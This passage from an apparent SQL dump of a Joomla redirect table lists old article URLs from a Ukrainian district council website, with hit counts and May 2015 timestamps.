00:00:00',301),(13584,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1285:2014-04-17-16-55-05&Itemid=14&lang=ru','','','',1,0,'2015-05-17 23:33:37','0000-00-00 00:00:00',301),(13585,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1315:-31-6-&lang=ru','','','',1,0,'2015-05-17 23:33:54','0000-00-00 00:00:00',301),(13586,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1314:2014-05-14-11-53-26&lang=en','','','',1,0,'2015-05-17 23:33:58','0000-00-00 00:00:00',301),(13587,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1266:2014-04-03-05-25-14&lang=ru','','','',1,0,'2015-05-17 23:33:59','0000-00-00 00:00:00',301),(13588,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1312:2014-05-08-08-59-19&Itemid=14&lang=en','','','',1,0,'2015-05-17 23:34:02','0000-00-00 00:00:00',301),(13589,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1311:-69-1941-1945-&Itemid=14&lang=ru','','','',1,0,'2015-05-17 23:34:03','0000-00-00 00:00:00',301),(13590,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1310:2014-05-06-14-07-43&Itemid=14&lang=uk','','','',1,0,'2015-05-17 23:34:05','0000-00-00 00:00:00',301),(13591,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1309:-2014-&Itemid=105&lang=en','','','',2,0,'2015-05-17 23:34:05','0000-00-00 00:00:00',301),(13592,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1308:2014-05-05-05-20-51&Itemid=14&lang=en','','','',1,0,'2015-05-17 23:34:08','0000-00-00 00:00:00',301),(13593,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1305:-30----&lang=uk','','','',1,0,'2015-05-17 23:34:09','0000-00-00 00:00:00',301),(13594,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1299:-lr-&Itemid=105&lang=ru','','','',1,0,'2015-05-17 23:34:14','0000-00-00 00:00:00',301),(13595,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1298:2014-04-24-11-02-55&Itemid=14&lang=uk','','','',2,0,'2015-05-17 23:34:15','0000-00-00 00:00:00',301),(13596,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1298:2014-04-24-11-02-55&Itemid=14&lang=ru','','','',1,0,'2015-05-17 23:34:16','0000-00-00 00:00:00',301),(13597,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1296:116---&Itemid=18&lang=uk','','','',2,0,'2015-05-17 23:34:17','0000-00-00 00:00:00',301),(13598,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1296:116---&Itemid=18&lang=ru','','','',2,0,'2015-05-17 23:34:18','0000-00-00 00:00:00',301),(13599,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1270:2014-04-08-13-49-40&Itemid=14&lang=ru','','','',1,0,'2015-05-17 23:34:20','0000-00-00 00:00:00',301),(13600,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1264:2014-04-01-11-27-13&lang=uk','','','',1,0,'2015-05-17 23:34:22','0000-00-00 00:00:00',301),(13601,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1274:-l-r&Itemid=98&lang=en','','','',1,0,'2015-05-17 23:34:27','0000-00-00 00:00:00',301),(13602,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1277:-2014-&Itemid=98&lang=uk','','','',1,0,'2015-05-17 23:34:50','0000-00-00 00:00:00',301),(13603,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1292:-i-&Itemid=14&lang=uk','','','',1,0,'2015-05-17 23:34:52','0000-00-00 00:00:00',301),(13604,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1279:2014-04-13-11-36-46&lang=uk','','','',1,0,'2015-05-17 23:34:54','0000-00-00 00:00:00',301),(13605,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1281:2014-04-15-09-13-01&Itemid=98&lang=en','','','',1,0,'2015-05-17 23:35:21','0000-00-00 00:00:00',301),(13606,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1286:2014-04-23-06-48-27&Itemid=17&lang=en','','','',1,0,'2015-05-17 23:35:27','0000-00-00 00:00:00',301),(13607,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1282:-30-6-&lang=ru','','','',1,0,'2015-05-17 23:35:30','0000-00-00 00:00:00',301),(13608,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1315:-31-6-&Itemid=14&lang=en','','','',1,0,'2015-05-17 23:35:39','0000-00-00 00:00:00',301),(13609,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1267:2014-04-03-21-52-50&lang=en','','','',1,0,'2015-05-17 23:35:52','0000-00-00 00:00:00',301),(13610,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1313:2014-05-14-10-00-55&Itemid=14&lang=ru','','','',1,0,'2015-05-17 23:35:54','0000-00-00 00:00:00',301),(13611,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1313:2014-05-14-10-00-55&lang=uk','','','',1,0,'2015-05-17 23:35:55','0000-00-00 00:00:00',301),(13612,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1313:2014-05-14-10-00-55&lang=ru','','','',1,0,'2015-05-17 23:35:59','0000-00-00 00:00:00',301),(13613,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1307:2014-04-30-15-26-52&Itemid=17&lang=en','','','',1,0,'2015-05-17 23:36:07','0000-00-00 00:00:00',301),(13614,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1306:2014-04-30-09-40-02&Itemid=105&lang=ru','','','',2,0,'2015-05-17 23:36:10','0000-00-00 00:00:00',301),(13615,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1306:2014-04-30-09-40-02&Itemid=105&lang=uk','','','',1,0,'2015-05-17 23:36:11','0000-00-00 00:00:00',301),(13616,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1303:2014-04-29-13-13-18&Itemid=17&lang=ru','','','',1,0,'2015-05-17 23:36:14','0000-00-00 00:00:00',301),(13617,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1288:2014-04-23-06-50-40&Itemid=17&lang=uk','','','',1,0,'2015-05-17 23:36:14','0000-00-00 00:00:00',301),(13618,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1301:-28-&Itemid=14&lang=ru','','','',2,0,'2015-05-17 23:36:15','0000-00-00 00:00:00',301),(13619,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1301:-28-&lang=uk','','','',1,0,'2015-05-17 23:36:16','0000-00-00 00:00:00',301),(13620,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1301:-28-&lang=ru','','','',1,0,'2015-05-17 23:36:18','0000-00-00 00:00:00',301),(13621,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1316:2014-05-20-12-49-29&Itemid=14&lang=uk','','','',2,0,'2015-05-17 23:36:23','0000-00-00 00:00:00',301),(13622,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1316:2014-05-20-12-49-29&lang=ru','','','',1,0,'2015-05-17 23:36:24','0000-00-00 00:00:00',301),(13623,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1298:2014-04-24-11-02-55&lang=ru','','','',1,0,'2015-05-17 23:36:31','0000-00-00 00:00:00',301),(13624,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1314:2014-05-14-11-53-26&Itemid=14&lang=ru','','','',2,0,'2015-05-17 23:36:57','0000-00-00 00:00:00',301),(13625,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1294:-2012-2015-&Itemid=105&lang=uk','','','',1,0,'2015-05-17 23:37:06','0000-00-00 00:00:00',301),(13626,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1293:-2014-&Itemid=105&lang=ru','','','',1,0,'2015-05-17 23:37:30','0000-00-00 00:00:00',301),(13627,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1278:2014-04-11-13-44-30&Itemid=14&lang=en','','','',1,0,'2015-05-17 23:37:31','0000-00-00 00:00:00',301),(13628,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1311:-69-1941-1945-&lang=en','','','',1,0,'2015-05-17 23:38:20','0000-00-00 00:00:00',301),(13629,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1310:2014-05-06-14-07-43&lang=ru','','','',1,0,'2015-05-17 23:38:22','0000-00-00 00:00:00',301),(13630,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1286:2014-04-23-06-48-27&Itemid=17&lang=ru','','','',1,0,'2015-05-17 23:38:22','0000-00-00 00:00:00',301),(13631,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1307:2014-04-30-15-26-52&Itemid=17&lang=ru','','','',1,0,'2015-05-17 23:38:24','0000-00-00 00:00:00',301),(13632,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1307:2014-04-30-15-26-52&Itemid=17&lang=uk','','','',1,0,'2015-05-17 23:38:24','0000-00-00 00:00:00',301),(13633,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1238:2014-03-09-06-41-00&lang=en','','','',1,0,'2015-05-17 23:38:25','0000-00-00 00:00:00',301),(13634,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1306:2014-04-30-09-40-02&Itemid=105&lang=en','','','',1,0,'2015-05-17 23:38:25','0000-00-00 00:00:00',301),(13635,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1305:-30----&Itemid=14&lang=uk','','','',2,0,'2015-05-17 23:38:27','0000-00-00 00:00:00',301),(13636,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1305:-30----&Itemid=14&lang=ru','','','',1,0,'2015-05-17 23:38:29','0000-00-00 00:00:00',301),(13637,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1283:2014-04-15-16-30-00&lang=en','','','',1,0,'2015-05-17 23:38:30','0000-00-00 00:00:00',301),(13638,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1297:2014-04-24-09-20-07&Itemid=17&lang=ru','','','',2,0,'2015-05-17 23:38:30','0000-00-00 00:00:00',301),(13639,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1297:2014-04-24-09-20-07&Itemid=17&lang=uk','','','',1,0,'2015-05-17 23:38:31','0000-00-00 00:00:00',301),(13640,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1150:2013-11-28-14-53-17&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',1,0,'2015-05-17 23:38:41','0000-00-00 00:00:00',301),(13641,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1274:----------------l--r&Itemid=70&lang=ru','','','',1,0,'2015-05-17 23:38:44','0000-00-00 00:00:00',301),(13642,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1293:-2014-&Itemid=70&lang=en','','','',1,0,'2015-05-17 23:38:54','0000-00-00 00:00:00',301),(13643,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1292:-i-&lang=uk','','','',1,0,'2015-05-17 23:39:15','0000-00-00 00:00:00',301),(13644,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1265:2014-04-01-11-43-46&lang=uk&Itemid=0','','','',1,0,'2015-05-17 23:39:20','0000-00-00 00:00:00',301),(13645,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1282:-30-6-&Itemid=14&lang=ru','','','',1,0,'2015-05-17 23:39:41','0000-00-00 00:00:00',301),(13646,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1285:2014-04-17-16-55-05&Itemid=14&lang=en','','','',2,0,'2015-05-17 23:48:24','0000-00-00 00:00:00',301),(13647,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1285:2014-04-17-16-55-05&lang=ru','','','',1,0,'2015-05-17 23:48:42','0000-00-00 00:00:00',301),(13648,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1285:2014-04-17-16-55-05&lang=uk','','','',1,0,'2015-05-17 23:48:52','0000-00-00 00:00:00',301),(13649,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1287:2014-04-23-06-49-34&Itemid=17&lang=en','','','',1,0,'2015-05-17 23:48:52','0000-00-00 00:00:00',301),(13650,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1314:2014-05-14-11-53-26&lang=uk','','','',1,0,'2015-05-17 23:49:08','0000-00-00 00:00:00',301),(13651,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1314:2014-05-14-11-53-26&lang=ru','','','',1,0,'2015-05-17 23:49:10','0000-00-00 00:00:00',301),(13652,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1312:2014-05-08-08-59-19&Itemid=14&lang=ru','','','',1,0,'2015-05-17 23:49:21','0000-00-00 00:00:00',301),(13653,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1312:2014-05-08-08-59-19&lang=en','','','',1,0,'2015-05-17 23:49:21','0000-00-00 00:00:00',301),(13654,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1309:-2014-&Itemid=105&lang=uk','','','',1,0,'2015-05-17 23:49:23','0000-00-00 00:00:00',301),(13655,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1309:-2014-&Itemid=105&lang=ru','','','',1,0,'2015-05-17 23:49:23','0000-00-00 00:00:00',301),(13656,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1308:2014-05-05-05-20-51&Itemid=14&lang=uk','','','',2,0,'2015-05-17 23:49:24','0000-00-00 00:00:00',301),(13657,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1308:2014-05-05-05-20-51&Itemid=14&lang=ru','','','',2,0,'2015-05-17 23:49:24','0000-00-00 00:00:00',301),(13658,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1305:-30----&lang=en','','','',1,0,'2015-05-17 23:49:27','0000-00-00 00:00:00',301),(13659,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1304:2014-04-30-09-11-23&Itemid=105&lang=uk','','','',2,0,'2015-05-17 23:49:27','0000-00-00 00:00:00',301),(13660,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1299:--------lr---&Itemid=70&lang=uk','','','',1,0,'2015-05-17 23:49:32','0000-00-00 00:00:00',301),(13661,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1299:--------lr---&Itemid=70&lang=ru','','','',1,0,'2015-05-17 23:49:34','0000-00-00 00:00:00',301),(13662,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1299:-lr-&Itemid=105&lang=en','','','',1,0,'2015-05-17 23:49:34','0000-00-00 00:00:00',301),(13663,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1268:-l-r&Itemid=98&lang=uk','','','',1,0,'2015-05-17 23:49:39','0000-00-00 00:00:00',301),(13664,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1270:2014-04-08-13-49-40&lang=ru','','','',1,0,'2015-05-17 23:49:40','0000-00-00 00:00:00',301),(13665,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1274:-l-r&Itemid=98&lang=uk','','','',1,0,'2015-05-17 23:49:48','0000-00-00 00:00:00',301),(13666,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1291:2014-04-23-11-37-34&lang=uk','','','',1,0,'2015-05-17 23:50:51','0000-00-00 00:00:00',301),(13667,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1291:2014-04-23-11-37-34&lang=ru','','','',1,0,'2015-05-17 23:50:58','0000-00-00 00:00:00',301),(13668,'http://www.malyn-rayrada.org.ua/attachments/article/26/history%20malyn%20region2.PDF','','','',3,0,'2015-05-18 01:03:01','0000-00-00 00:00:00',301),(13669,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=855:2012-12-12-14-22-20&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2015-05-18 05:02:22','0000-00-00 00:00:00',301),(13670,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=836:-6732012&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2015-05-18 05:09:46','0000-00-00 00:00:00',301),(13671,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=836:-6732012&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2015-05-18 05:09:50','0000-00-00 00:00:00',301),(13672,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=836:-6732012&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2015-05-18 05:09:52','0000-00-00 00:00:00',301),(13673,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=855:2012-12-12-14-22-20&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2015-05-18 05:10:11','0000-00-00 00:00:00',301),(13674,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=855:2012-12-12-14-22-20&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2015-05-18 05:10:14','0000-00-00 00:00:00',301),(13675,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=855:2012-12-12-14-22-20&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2015-05-18 05:10:19','0000-00-00 00:00:00',301),(13676,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=510:-2011-&catid=38:--19122011-&Itemid=73&lang=en','','','',3,0,'2015-05-18 07:08:38','0000-00-00 00:00:00',301),(13677,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=512:2011-12-21-12-46-13&catid=38&Itemid=73&lang=ru','','','',2,0,'2015-05-18 07:08:47','0000-00-00 00:00:00',301),(13678,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=512:2011-12-21-12-46-13&catid=38:--19122011-&Itemid=73&lang=en','','','',2,0,'2015-05-18 07:08:53','0000-00-00 00:00:00',301),(13679,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=512:2011-12-21-12-46-13&catid=38:--19122011-&Itemid=73&lang=ru','','','',5,0,'2015-05-18 07:08:56','0000-00-00 00:00:00',301),(13680,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=512:2011-12-21-12-46-13&catid=38:--19122011-&Itemid=73&lang=uk','','','',2,0,'2015-05-18 07:09:00','0000-00-00 00:00:00',301),(13681,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=520:-2012-2013-&catid=38&Itemid=73&lang=en','','','',2,0,'2015-05-18 07:10:41','0000-00-00 00:00:00',301),(13682,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=520:-2012-2013-&catid=38&Itemid=73&lang=ru','','','',2,0,'2015-05-18 07:10:43','0000-00-00 00:00:00',301),(13683,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=520:-2012-2013-&catid=38:--19122011-&Itemid=73&lang=en','','','',2,0,'2015-05-18 07:10:46','0000-00-00 00:00:00',301),(13684,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=520:-2012-2013-&catid=38:--19122011-&Itemid=73&lang=ru','','','',4,0,'2015-05-18 07:10:49','0000-00-00 00:00:00',301),(13685,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=750:2012-09-01-09-40-02&catid=11&lang=en','','','',2,0,'2015-05-18 07:14:46','0000-00-00 00:00:00',301),(13686,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=750:2012-09-01-09-40-02&catid=11&lang=ru','','','',2,0,'2015-05-18 07:14:49','0000-00-00 00:00:00',301),(13687,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=758:--15---&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2015-05-18 07:15:09','0000-00-00 00:00:00',301),(13688,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=758:--15---&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2015-05-18 07:15:12','0000-00-00 00:00:00',301),(13689,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=763:2012-09-24-07-57-43&catid=11&lang=en','','','',2,0,'2015-05-18 07:15:51','0000-00-00 00:00:00',301),(13690,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=763:2012-09-24-07-57-43&catid=11&lang=ru','','','',2,0,'2015-05-18 07:15:55','0000-00-00 00:00:00',301),(13691,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=764:2012-09-26-12-58-07&catid=11&lang=en','','','',2,0,'2015-05-18 07:15:59','0000-00-00 00:00:00',301),(13692,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=779:2012-10-03-12-34-44&catid=11&lang=ru','','','',2,0,'2015-05-18 07:17:05','0000-00-00 00:00:00',301),(13693,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=779:2012-10-03-12-34-44&catid=11&lang=ru&Itemid=','','','',2,0,'2015-05-18 07:17:14','0000-00-00 00:00:00',301),(13694,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=779:2012-10-03-12-34-44&catid=11&lang=uk&Itemid=','','','',2,0,'2015-05-18 07:17:17','0000-00-00 00:00:00',301),(13695,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=779:2012-10-03-12-34-44&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2015-05-18 07:17:21','0000-00-00 00:00:00',301),(13696,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=779:2012-10-03-12-34-44&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2015-05-18 07:17:24','0000-00-00 00:00:00',301),(13697,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=779:2012-10-03-12-34-44&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2015-05-18 07:17:29','0000-00-00 00:00:00',301),(13698,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=780:2012-10-04-07-48-30&catid=45&Itemid=84&lang=en','','','',2,0,'2015-05-18 07:17:32','0000-00-00 00:00:00',301),(13699,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=780:2012-10-04-07-48-30&catid=45&Itemid=84&lang=ru','','','',2,0,'2015-05-18 07:17:35','0000-00-00 00:00:00',301),(13700,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=780:2012-10-04-07-48-30&catid=45:--14112012-&Itemid=84&lang=en','','','',2,0,'2015-05-18 07:17:40','0000-00-00 00:00:00',301),(13701,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=780:2012-10-04-07-48-30&catid=45:--14112012-&Itemid=84&lang=ru','','','',2,0,'2015-05-18 07:17:44','0000-00-00 00:00:00',301),(13702,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=780:2012-10-04-07-48-30&catid=45:--14112012-&Itemid=84&lang=uk','','','',2,0,'2015-05-18 07:17:47','0000-00-00 00:00:00',301),(13703,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=787:2012-10-15-09-13-25&catid=45&Itemid=84&lang=en','','','',2,0,'2015-05-18 07:20:34','0000-00-00 00:00:00',301),(13704,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=787:2012-10-15-09-13-25&catid=45&Itemid=84&lang=ru','','','',2,0,'2015-05-18 07:20:37','0000-00-00 00:00:00',301),(13705,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=787:2012-10-15-09-13-25&catid=45:--14112012-&Itemid=84&lang=en','','','',2,0,'2015-05-18 07:20:41','0000-00-00 00:00:00',301),(13706,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=787:2012-10-15-09-13-25&catid=45:--14112012-&Itemid=84&lang=ru','','','',2,0,'2015-05-18 07:20:45','0000-00-00 00:00:00',301),(13707,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=787:2012-10-15-09-13-25&catid=45:--14112012-&Itemid=84&lang=uk','','','',2,0,'2015-05-18 07:20:50','0000-00-00 00:00:00',301),(13708,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=792:2012-10-17-06-26-37&catid=45&Itemid=84&lang=en','','','',2,0,'2015-05-18 07:22:48','0000-00-00 00:00:00',301),(13709,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=792:2012-10-17-06-26-37&catid=45&Itemid=84&lang=ru','','','',5,0,'2015-05-18 07:22:54','0000-00-00 00:00:00',301),(13710,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=792:2012-10-17-06-26-37&catid=45:--14112012-&Itemid=84&lang=en','','','',2,0,'2015-05-18 07:22:58','0000-00-00 00:00:00',301),(13711,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=792:2012-10-17-06-26-37&catid=45:--14112012-&Itemid=84&lang=ru','','','',3,0,'2015-05-18 07:23:02','0000-00-00 00:00:00',301),(13712,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=792:2012-10-17-06-26-37&catid=45:--14112012-&Itemid=84&lang=uk','','','',6,0,'2015-05-18 07:23:06','0000-00-00 00:00:00',301),(13713,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=800:-l-r&catid=45&Itemid=84&lang=en','','','',2,0,'2015-05-18 07:27:10','0000-00-00 00:00:00',301),(13714,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=800:-l-r&catid=45&Itemid=84&lang=ru','','','',2,0,'2015-05-18 07:27:13','0000-00-00 00:00:00',301),(13715,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=800:-l-r&catid=45:--14112012-&Itemid=84&lang=ru','','','',3,0,'2015-05-18 07:27:19','0000-00-00 00:00:00',301),(13716,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=800:-l-r&catid=45:--14112012-&Itemid=84&lang=uk','','','',2,0,'2015-05-18 07:27:22','0000-00-00 00:00:00',301),(13717,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=817:---------------l--r&catid=45:--14112012-&Itemid=84&lang=en','','','',2,0,'2015-05-18 07:28:57','0000-00-00 00:00:00',301),(13718,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=817:---------------l--r&catid=45:--14112012-&Itemid=84&lang=ru','','','',2,0,'2015-05-18 07:29:00','0000-00-00 00:00:00',301),(13719,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=411:-2014-&catid=37:--21102011-&Itemid=72&lang=ru','','','',5,0,'2015-05-18 11:25:52','0000-00-00 00:00:00',301),(13720,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38:--19122011-&id=510:-2011-&lang=uk&option=com_content&view=article','','','',3,0,'2015-05-18 15:41:49','0000-00-00 00:00:00',301),(13721,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=764:2012-09-26-12-58-07&lang=ru&option=com_content&view=article','','','',3,0,'2015-05-18 21:46:03','0000-00-00 00:00:00',301),(13722,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38:--19122011-&id=512:2011-12-21-12-46-13&lang=uk&option=com_content&view=article','','','',3,0,'2015-05-19 06:35:54','0000-00-00 00:00:00',301),(13723,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=779:2012-10-03-12-34-44&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2015-05-19 06:58:44','0000-00-00 00:00:00',301),(13724,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1086-pro-khid-vikonannya-rajonnoji-programi-rozvitku-agropromislovogo-kompleksu-malinskogo-rajonu-na-2011-2015-roki-ta-pidsumki-vesnyano-polovikh-robit','','','',4,0,'2015-05-19 15:03:41','0000-00-00 00:00:00',301),(13725,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1086-pro-khid-vikonannya-rajonnoji-programi-rozvitku-agropromislovogo-kompleksu-malinskogo-rajonu-na-2011-2015-roki-ta-pidsumki-vesnyano-polovikh-robit','','http://www.google.com.ua/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0CC0QFjAC&url=http%3A%2F%2Fwww.malyn-rayrada.org.ua%2Findex.php%2Frishennja-radi','',16,0,'2015-05-20 05:30:30','0000-00-00 00:00:00',301),(13726,'http://malyn-rayrada.org.ua/index.php/467-mikola-dushko-problem-z-reestracieju-zemli-bude','','','',6,0,'2015-05-20 09:04:32','0000-00-00 00:00:00',301),(13727,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=713:2012-06-14-15-13-57&catid=43&Itemid=82&lang=uk','','','',3,0,'2015-05-20 09:05:21','0000-00-00 